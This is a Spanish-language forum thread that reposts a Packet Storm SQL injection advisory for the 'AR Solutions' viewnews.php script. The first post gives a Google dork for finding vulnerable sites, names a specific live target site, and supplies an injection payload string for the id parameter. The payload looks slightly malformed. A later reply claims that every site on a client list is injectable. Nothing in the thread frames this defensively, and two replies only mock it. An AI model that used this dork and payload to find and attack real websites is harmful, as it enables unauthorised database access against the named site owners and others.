PDA

Ver la versión completa : vulnerable a injeccion remota SQL



DEBIANito
01-09-2011, 00:35
**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

[+] DORK: "AR SOLUTIONS" inurl:viewnews.php?id=

[+] URL: http://bestfan.com/viewnews.php?id=[sqli]

[+] EJEMPLO:
http://bestfan.com/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,1 1,12--

***********************************************
******************ruben_linux******************
***********************************************

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

Atreides
01-09-2011, 01:22
¿Se puede saber qué cojones es esto?

clarinetista
01-09-2011, 15:31
Tiene toda pinta de una inyección SQL, pero espera a ver si es en 3D.... :D

ratah4x0r
09-01-2012, 19:21
Tambien todos los sitios listados aca:
http://www.XXXX.com/listadodeclientes/?lang=es

Todos estos sitios de esa lista tienen inyeccion sql.

variable:
www.sitioweb.com/cat?=